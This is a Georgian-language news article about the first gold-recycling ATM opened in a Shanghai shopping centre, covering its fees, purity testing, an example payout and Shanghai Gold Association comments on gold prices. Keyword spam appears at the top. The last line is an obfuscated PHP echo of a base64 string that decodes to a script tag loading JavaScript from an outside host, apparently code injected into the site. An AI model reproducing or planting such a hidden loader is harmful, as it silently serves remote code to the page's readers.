gorgia
ავერსი jaluzi

 ჩინეთის უდიდეს ქალაქ შანხაიში პირველი ბანკომატი დამონტაჟდა, რომელიც ოქროს გადასამუშავებლად იღებს. ოქროს პირველი ბანკომატი ძვირფას მეტალზე ფასის ზრდის ფონზე გაიხსნა.

ინფორმაციას Mining ავრცელებს.

გამოცემის ცნობით, სავაჭრო ცენტრ Global Harbor-ში მდებარე ბანკომატთან მომხმარებლების გრძელი რიგებია.

შენჩჟენში დაფუძნებული საიუველირო კომპანია Kinghood Group-ის მიერ ოპერირებული ბანკომატი 3 გრამზე მეტი წონისა და, მინიმუმ, 50%-ით სუფთა ოქროს ნივთების მისაღებად არის შექმნილი.

გადამუშავების პროცესი მოიცავს ავთენტიფიკაციას, 1000°C-ზე მაღალ ტემპერატურაზე დნობასა და მეორე ანალიზს სისუფთავის დასადგენად. მომხმარებლის საბანკო ანგარიშზე თანხის გადარიცხვამდე თითო გრამზე 18 იუანის (2.50 დოლარი) მომსახურების საფასური ირიცხება.

მაგალითად, 40-გრამიანი ოქროს ყელსაბამი გრამზე 785 იუანად (108 დოლარად) შეფასდა, ხოლო 30 წუთში მასში 36.000 იუანზე (4.900 დოლარზე) მეტი გადაიხადეს.

შანხაის ოქროს ასოციაციაში აცხადებენ, რომ „ჭკვიანი ოქროს ბანკომატების დანერგვა, პირველ რიგში, გადამუშავების ფუნქციას ბიზნესის თვალსაზრისით ასრულებენ. ეს ასახავს იმ ფაქტს, რომ ოქროს ფასების ზრდასთან ერთად მისი ღირებულება ხელზეც მნიშვნელოვნად გაიზარდა, რამაც ოქროს განაღდების სურვილის გაძლიერება გამოიწვია.“

თუმცა ასოციაცია მოსახლეობას ურჩევს, “თავიანთი ოქროს მარაგის გაყიდვა არ იჩქარონ “ და ის გარკვეული დროით კიდევ შეინახონ.

„ოქრო ძლიერ აღმავალ იმპულსს კვლავ ავლენს, რაც, ძირითადად, ცენტრალური ბანკებისა და ინსტიტუციური ინვესტორების მიერ ოქროს დაჩქარებული შესყიდვებით არის განპირობებული,“ - აცხადებენ ასოციაციაში.

133
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");